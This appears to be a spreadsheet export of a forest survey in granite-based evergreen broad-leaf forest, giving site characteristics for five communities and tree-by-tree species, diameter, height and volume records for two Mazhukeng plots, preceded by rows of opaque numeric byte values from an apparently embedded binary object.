	125 113 194 224 93 214 213 253 0 222 28 217 85 47 5 135 226 205 108 73 149 96 107 42 219 116 65 211 184 128 162 176 160 66 47 189 102 171 196 143 119 239 64 114 164 37 216 64 156 157 49 217 143 87 76 11 77 67 241 115 87 93 119 18 111 200 133 19 43 94 52 191 47 125 243 92 193 133 109 158 248 6 123 94 174 215 252 193 190 118 50 98 123 31 150 247 70 240 180 141 174 105 60 151 254 101 213 193 221 91 …
	235 203 42 28 162 16 221 251 63 161 179 47 87 109 221 97 127 65 28 62 246 61 177 184 26 23 86 190 32 62 35 70 131 81 161 235 135 190 39 100 188 22 175 70 85 213 120 57 174 114 86 43 53 94 244 245 216 54 199 111 43 106 28 223 90 181 104 245 7 171 231 20 90 239 183 152 47 23 13 31 65 171 31 188 250 109 131 48 97 74 222 185 76 40 49 180 15 160 110 139 217 98 254 219 186 255 99 39 249 105 39 107 206 …
	169 65 186 170 164 75 211 135 73 215 46 149 106 210 210 154 116 142 128 74 69 100 169 33 105 26 215 164 45 197 100 69 186 174 38 93 229 74 47 90 67 101 170 111 34 115 145 200 236 174 78 135 214 49 153 252 251 49 25 39 102 81 99 26 61 116 83 149 53 68 252 51 186 48 37 122 215 91 211 18 74 155 243 200 106 140 160 148 84 204 115 72 118 9 166 62 239 160 218 106 37 100 77 147 5 216 162 207 168 209 139…
	164 110 215 248 165 127 22 227 175 45 61 121 147 12 224 255 99 239 89 160 219 42 174 28 61 201 138 163 200 137 136 147 0 177 113 132 67 154 16 108 71 146 229 111 226 52 250 218 38 182 100 91 78 130 137 192 79 150 158 226 135 101 73 72 207 63 8 193 9 161 229 31 74 161 205 158 3 52 244 147 205 110 23 54 225 211 5 150 179 11 36 228 0 27 2 105 216 238 66 183 219 208 45 61 229 83 32 77 248 236 90 182 …
	72 45 229 40 35 130 123 20 240 6 77 60 5 32 236 10 155 51 93 225 210 34 252 88 168 216 11 138 169 140 153 200 213 180 23 88 201 86 114 185 86 18 115 124 126 107 222 14 7 175 189 133 196 243 201 148 134 214 31 243 119 230 145 145 125 34 253 181 139 242 246 20 82 55 93 75 42 68 57 37 162 234 73 41 37 106 3 185 68 33 138 172 129 134 90 151 251 18 190 156 182 220 138 172 166 146 199 3 12 89 154 121 1…
	20 148 246 111 16 254 6 194 129 148 76 215 28 90 89 43 122 5 189 89 153 139 231 159 127 27 50 243 110 102 154 101 101 3 229 212 101 210 55 166 169 223 62 150 144 15 213 165 51 236 47 210 228 40 58 173 176 60 191 81 193 17 27 140 7 18 220 220 78 22 72 244 9 9 71 44 58 60 186 146 37 243 73 175 189 119 56 144 232 149 96 55 150 176 64 211 112 223 166 40 31 140 133 184 47 246 179 68 3 244 166 213 42 2…
	23 18 23 8 133 100 247 6 144 221 140 144 64 35 188 114 197 180 2 33 71 225 55 17 133 199 142 254 64 34 16 20 184 68 50 177 13 123 85 38 206 59 176 87 4 146 161 242 33 40 137 196 226 72 205 168 128 171 97 127 249 172 252 124 134 135 192 222 155 239 157 1 133 167 171 45 216 153 19 92 32 20 136 68 158 223 132 121 10 163 194 55 126 142 101 9 49 33 16 73 2 83 118 199 21 110 139 219 69 112 149 99 236 1…
	39 193 93 206 61 227 23 104 111 29 87 237 116 90 156 238 122 39 49 89 29 149 53 118 183 141 84 154 77 102 123 165 221 249 67 87 205 184 211 102 27 183 91 199 11 24 203 109 206 142 46 111 115 151 141 180 27 221 173 109 46 159 159 180 183 58 186 188 62 175 155 116 27 189 110 119 171 195 197 248 53 234 118 159 183 161 202 73 218 218 150 211 157 90 70 250 61 240 91 220 198 6 99 149 201 232 237 83 61 …
	156 62 56 26 253 162 78 19 85 218 177 192 32 125 157 104 10 69 138 14 168 85 89 111 25 13 72 119 169 10 157 100 53 79 59 141 108 133 38 112 255 17 167 145 209 1 104 21 196 208 89 232 114 120 2 133 73 236 9 205 240 23 212 45 52 179 155 180 18 60 235 0 218 30 48 188 0 107 135 191 158 156 148 118 184 119 208 39 125 16 64 45 67 186 15 122 184 13 96 46 16 32 191 180 190 43 95 107 165 59 23 220 85 65 1…
	16 13 161 77 144 145 162 182 36 126 203 66 78 116 242 131 56 90 146 199 251 174 115 31 255 195 200 32 64 177 123 51 89 183 134 113 163 118 38 150 68 167 240 114 65 30 60 181 248 13 152 145 103 162 253 184 93 151 220 157 193 143 37 208 145 187 140 239 227 4 244 213 158 137 14 245 225 103 165 100 186 186 251 113 19 253 147 153 184 144 24 226 52 119 173 18 237 63 177 68 232 169 1 150 168 245 155 237…
	32 142 92 49 140 162 197 41 216 127 204 63 131 147 193 126 225 52 182 137 114 210 180 119 45 86 118 184 175 7 55 65 95 242 16 54 208 112 159 107 52 24 9 12 82 22 223 250 50 74 0 77 15 124 93 76 237 145 247 75 115 145 223 94 143 226 54 220 39 198 86 126 132 18 212 28 235 126 242 126 69 54 186 184 72 44 16 90 249 158 82 37 52 137 143 217 34 145 248 118 150 44 204 192 176 31 1 48 99 209 123 247 144 …
	163 50 167 34 215 15 241 66 195 99 108 230 200 226 125 47 162 36 243 209 164 112 220 47 139 122 134 0 4 55 190 136 200 120 151 24 89 112 88 49 192 103 161 36 70 198 154 16 169 21 239 135 230 207 68 18 19 70 155 68 165 208 205 137 235 143 217 1 6 50 59 110 146 140 30 186 172 125 192 185 86 46 121 95 48 188 183 231 202 54 14 121 255 99 161 52 47 64 55 30 184 205 243 217 247 223 124 219 104 49 153 1…
	161 250 64 172 110 0 97 2 25 158 87 70 191 218 57 66 205 151 2 204 164 135 168 165 33 14 179 238 122 152 155 214 146 26 156 25 106 15 73 61 73 246 150 7 189 140 122 50 128 10 215 86 57 219 218 114 77 150 47 49 243 200 65 146 223 156 201 163 169 115 150 52 66 46 124 93 140 61 248 242 244 171 12 151 127 114 188 241 117 233 11 127 175 79 135 231 94 115 243 201 141 207 150 255 249 254 190 140 142 92 …
	61 171 183 77 60 80 212 115 230 187 88 55 173 47 52 208 210 89 212 163 79 247 120 159 217 58 191 123 124 12 161 47 250 212 227 88 254 123 190 207 239 60 241 173 219 183 170 160 212 214 158 36 187 209 115 167 71 159 190 214 179 236 222 162 158 70 207 200 45 136 219 218 51 113 231 202 158 198 49 125 250 112 239 222 190 59 6 78 15 34 84 231 95 16 64 122 245 233 207 239 76 250 26 199 222 29 65 232 41…
	189 231 204 153 115 239 61 59 120 213 110 27 79 175 172 204 233 224 32 156 223 53 70 49 24 181 104 161 246 14 170 187 199 255 102 139 242 130 186 11 6 225 152 45 187 75 37 157 216 199 255 14 178 5 89 4 189 185 72 65 185 173 11 170 233 241 112 171 46 141 110 156 61 212 168 149 218 139 49 76 123 104 80 101 71 157 254 4 208 192 70 149 127 250 251 146 219 117 179 226 63 184 40 142 137 226 111 221 8 2…
	171 123 45 126 253 19 45 220 19 212 230 110 235 188 158 126 164 215 53 237 193 11 207 146 141 150 103 91 253 218 196 247 236 78 171 31 192 226 122 146 223 150 47 115 85 60 208 5 229 116 205 135 173 230 114 38 73 59 190 87 15 95 183 129 71 74 75 160 233 52 254 59 231 249 156 130 181 12 255 47 227 255 205 20 172 192 244 42 90 125 38 107 113 195 99 180 255 131 235 45 15 153 242 53 38 157 203 53 149 …
	74 203 79 31 160 25 148 155 253 163 238 193 198 33 15 29 159 217 223 178 233 108 221 129 214 184 138 21 245 177 163 177 245 151 246 158 238 238 108 160 249 135 235 47 94 126 161 164 98 255 246 216 209 220 154 199 26 68 197 100 247 59 245 142 1 58 179 107 176 111 112 77 205 174 157 244 249 184 123 235 5 72 255 243 237 228 52 33 134 128 12 60 80 243 128 21 64 5 208 11 188 4 248 128 119 129 147 192 …
	90 66 115 47 225 108 201 65 191 133 181 171 83 181 181 159 87 228 205 253 191 221 135 225 254 254 111 162 94 63 85 20 172 190 54 250 10 246 177 24 212 124 113 248 181 254 183 182 172 218 87 91 231 169 212 107 173 17 127 85 94 29 189 134 61 189 17 238 210 222 35 238 27 173 77 91 104 44 244 160 112 102 58 151 102 138 134 76 122 183 125 17 158 49 107 75 29 98 67 169 17 213 80 150 34 182 149 62 16 21…
	131 131 60 31 31 65 175 177 74 226 189 70 116 45 32 228 58 115 4 61 112 177 196 123 224 208 206 22 114 122 98 4 156 182 8 78 33 141 37 228 52 107 4 181 176 81 226 181 112 46 233 244 152 90 113 43 15 121 61 57 130 82 251 182 40 53 212 41 42 215 105 17 125 157 238 145 107 218 8 198 190 239 72 124 236 67 141 52 228 49 123 4 109 246 132 196 219 44 234 146 125 232 154 190 13 249 164 143 160 180 94 23 …
	168 205 219 50 31 232 163 47 142 17 170 79 248 233 153 12 88 78 20 106 169 147 132 225 73 180 137 63 77 24 186 68 251 243 143 51 174 252 191 20 63 18 51 126 96 37 110 198 236 6 60 192 240 128 67 70 234 93 63 5 68 85 174 30 241 77 226 3 64 84 223 26 111 98 116 44 237 84 192 39 1 151 2 230 155 248 225 205 155 0 183 0 214 1 238 4 220 7 120 0 240 16 224 171 128 63 4 124 199 196 143 132 184 7 136 7 16…
	195 228 144 28 113 142 120 199 104 199 35 142 177 142 36 199 120 135 205 49 201 97 82 37 53 65 29 173 38 170 227 212 71 213 41 234 116 117 185 234 84 55 169 21 234 115 106 239 87 190 167 152 198 54 178 191 5 217 83 237 83 237 22 199 24 71 162 99 156 195 234 72 118 164 56 44 32 223 82 117 163 250 190 250 225 31 45 213 63 143 234 78 56 197 142 176 111 183 77 248 51 228 65 50 182 246 135 5 249 223 5…
	226 154 170 51 228 91 127 159 46 239 57 154 37 239 170 205 144 139 102 102 200 63 237 202 144 95 125 61 83 254 37 240 255 37 132 249 20 120 119 229 129 60 112 191 188 34 83 206 41 74 151 159 249 143 52 249 98 124 134 220 210 145 33 159 152 152 37 191 147 146 37 231 190 145 37 191 5 105 101 64 62 63 123 97 137 252 220 154 116 249 191 236 153 242 143 33 237 55 64 254 37 73 153 242 67 240 123 183 48…
	168 31 175 65 189 209 218 67 42 184 223 219 253 120 203 231 5 62 231 137 77 199 190 243 155 154 247 218 199 208 185 218 38 106 43 122 232 1 183 102 137 7 1 121 46 158 200 121 117 78 226 97 173 14 126 189 2 97 227 180 254 23 191 7 183 241 214 144 95 95 211 236 113 45 208 87 105 150 202 240 59 94 28 80 243 28 11 125 57 70 91 241 252 27 93 147 219 229 241 44 90 72 31 42 75 242 132 149 95 52 72 138 2…
	219 161 107 21 157 147 200 19 211 158 173 93 28 42 115 136 23 150 183 13 91 48 130 62 159 107 235 106 189 97 233 134 165 35 210 102 58 185 33 72 89 149 39 84 86 193 124 64 29 8 150 63 220 135 229 105 125 93 80 70 173 79 197 241 89 187 239 156 18 49 23 21 254 87 116 240 17 128 222 189 33 112 103 239 157 100 55 14 231 53 175 82 103 84 227 127 2 175 47 222 105 135 94 180 164 236 89 191 235 206 165 2…
	234 53 46 88 22 4 241 255 136 138 89 20 118 57 61 141 154 59 121 129 200 31 47 44 197 151 198 31 102 241 172 231 241 24 229 84 174 161 18 80 109 184 130 114 207 130 233 240 71 254 81 161 138 70 245 164 72 84 52 107 161 90 156 167 175 58 139 110 10 78 170 13 151 40 242 12 33 131 106 59 196 157 92 64 238 228 121 57 61 73 95 121 74 100 85 188 99 81 212 226 197 171 182 78 94 207 133 240 169 156 43 24…
	186 111 225 75 228 45 36 48 141 182 76 174 105 239 52 247 32 132 197 253 147 211 15 38 225 171 199 246 113 134 186 55 106 224 151 124 216 0 22 195 240 224 87 176 178 239 189 99 13 244 248 199 4 148 7 56 18 126 205 236 95 101 9 248 204 216 69 174 74 132 218 98 133 128 74 254 193 162 96 151 214 75 217 182 67 207 112 227 97 168 69 6 150 119 106 163 76 254 69 109 20 40 167 225 134 54 104 174 131 204 …
	83 176 86 5 76 5 76 7 92 12 152 243 20 47 143 72 29 170 202 236 181 213 245 180 204 174 172 170 145 43 183 54 120 171 234 88 172 245 86 180 245 142 126 29 66 28 106 106 119 84 110 207 88 28 226 216 232 218 190 96 200 149 24 95 97 69 95 151 13 177 146 141 182 210 12 73 176 104 161 110 197 203 133 30 106 253 171 173 175 98 172 128 117 171 34 253 106 54 44 197 5 25 181 97 50 52 106 94 80 198 77 181 …
	53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68…

## Sheet: Plot information
Community	Elevation /m	Slope gradient/°	Slope aspect	Parent rock	Coenotype
Mazhukeng	280	26	south	granite	evergreen broad-leaf forest
Guangyin Zuolian	320	7	-	granite	evergreen broad-leaf forest
Pubuxia	126	32	north by east30°	granite	evergreen broad-leaf forest
Xiegang	333	21	north	granite	evergreen broad-leaf forest
Jieshi	575	19	north	granite	evergreen broad-leaf forest

## Sheet: Mazhukeng
Site	Stand	Plot	Family	Genus	Species	SpCode	DBH/cm	Height/m	Branch.h/m	Volume/m3
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1	0.000543971
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1.5	0.000543971
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.5	0.000379528
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.2	0.000650978
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	1.2	0.0013926
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	0.5	0.000757716
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	0.8	0.000757716
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1	0.000757716
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.8	0.000757716
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	3.5	1	0.00278028
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1	0.000864223
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	2	0.000864223
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	2	0.000864223
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	2	0.000864223
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.5	0.00184878
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	2	0.00184878
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1	0.00184878
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.8	0.00184878
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.6	0.00184878
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4	2	0.00317108
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4.5	1.5	0.0020762
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4.5	2	0.0020762
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4.5	1.4	0.0020762
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	5	3	0.000293425
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	5	2	0.00107666
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	2	0.00230323
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	1.8	0.00395057
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	3	0.00395057
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5.5	2.3	0.00433941
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5.5	3.5	0.00433941
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	6	3	0.00472771
Mazhukeng	1	P001	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	6	3.5	0.00718464
Mazhukeng	1	P001	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	5	3	0.00395057
Mazhukeng	1	P001	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	6	3.5	0.00275631
Mazhukeng	1	P001	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	7	3	0.00550289
Mazhukeng	1	P001	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2.5	0.8	0.000317142
Mazhukeng	1	P001	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2.5	1.3	0.000317142
Mazhukeng	1	P001	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	3	5	2.5	0.00230323
Mazhukeng	1	P001	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	1	2	1.5	0.000118999
Mazhukeng	1	P001	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	9	2	0.0738742
Mazhukeng	1	P001	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	10	1.4	0.131299
Mazhukeng	1	P001	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	3	3	1.7	0.0013926
Mazhukeng	1	P001	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	4	3.5	1.7	0.00278028
Mazhukeng	1	P001	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	5	2.4	0.00395057
Mazhukeng	1	P001	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	5	2	0.00395057
Mazhukeng	1	P001	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	5	2	0.00600364
Mazhukeng	1	P001	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	6	3.5	0.00128845
Mazhukeng	1	P001	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	6	4	0.00275631
Mazhukeng	1	P001	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	6	3	0.00472771
Mazhukeng	1	P001	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	7	6	2.7	0.0135042
Mazhukeng	1	P001	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	7	2.8	0.00836267
Mazhukeng	1	P001	Euphorbiaceae	Glochidion	Glochidion puberum (L.) Hutch.	GLOPUB	5	5	3.5	0.00600364
Mazhukeng	1	P001	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	2	2.5	1.3	0.000543971
Mazhukeng	1	P001	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	6	2.5	0.0101137
Mazhukeng	1	P001	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	6	2.8	0.0173473
Mazhukeng	1	P001	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	4.5	0.0201917
Mazhukeng	1	P001	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	7	2	0.0251831
Mazhukeng	1	P001	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	8	2	0.0492664
Mazhukeng	1	P001	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	14	8	2.5	0.0657824
Mazhukeng	1	P001	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	2.5	2	1.7	0.000663557
Mazhukeng	1	P001	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	2.5	3	2.4	0.000989284
Mazhukeng	1	P001	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	2.5	1.5	0.000543971
Mazhukeng	1	P001	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	8	5	2	0.0144958
Mazhukeng	1	P001	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	8	5	1.3	0.0144958
Mazhukeng	1	P001	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	7	6	1.7	0.0135042
Mazhukeng	1	P001	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	9	6	3	0.0216356
Mazhukeng	1	P001	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3.5	1.7	0.000757716
Mazhukeng	1	P001	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	3.5	2	0.00162093
Mazhukeng	1	P001	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	3.5	1.5	0.00162093
Mazhukeng	1	P001	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	4	0.8	0.000864223
Mazhukeng	1	P001	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	4	2	0.00184878
Mazhukeng	1	P001	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	4	4	2	0.00317108
Mazhukeng	1	P001	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	5	2.5	0.00230323
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	1	0.000177413
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	0.4	0.000177413
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	1.3	0.000177413
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.3	0.000379528
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.5	0.000650978
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.4	0.000650978
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	2	0.000650978
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.5	0.000650978
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.5	0.000650978
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.5	0.000650978
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.5	0.000650978
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	3	1.5	0.000989284
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3.2	1.5	0.000189057
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	0.5	0.000441757
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	1.5	0.000441757
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1	0.000757716
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	2	0.000757716
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	2	0.00162093
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	1.2	0.00162093
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	2	0.000864223
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	2	0.000864223
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	2	0.000864223
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	2	0.00184878
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	2	0.00184878
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.5	0.00184878
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	2	0.00184878
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.8	0.00184878
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4	2.4	0.00317108
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	4.5	2	0.000264501
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	0.8	0.00395057
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	2	0.00395057
Mazhukeng	1	P002	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	2	0.00395057
Mazhukeng	1	P002	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	6	7	3.5	0.011772
Mazhukeng	1	P002	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	1.5	3	2	0.000379528
Mazhukeng	1	P002	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	3.5	1.4	0.00278028
Mazhukeng	1	P002	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	6	4.5	2	0.00761816
Mazhukeng	1	P002	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	5	3.5	0.00230323
Mazhukeng	1	P002	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	11	6	1.5	0.0315224
Mazhukeng	1	P002	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	8	3	0.0349983
Mazhukeng	1	P002	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	3.5	1.8	0.00162093
Mazhukeng	1	P002	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	3.5	2	0.00162093
Mazhukeng	1	P002	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	4	4	1.5	0.00317108
Mazhukeng	1	P002	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	3	3	1.5	0.0013926
Mazhukeng	1	P002	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	2	4	2	0.000864223
Mazhukeng	1	P002	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	4	4	1.5	0.00317108
Mazhukeng	1	P002	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	8	2	0.0349983
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	3.5	1.4	0.000757716
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	4	1.5	0.000864223
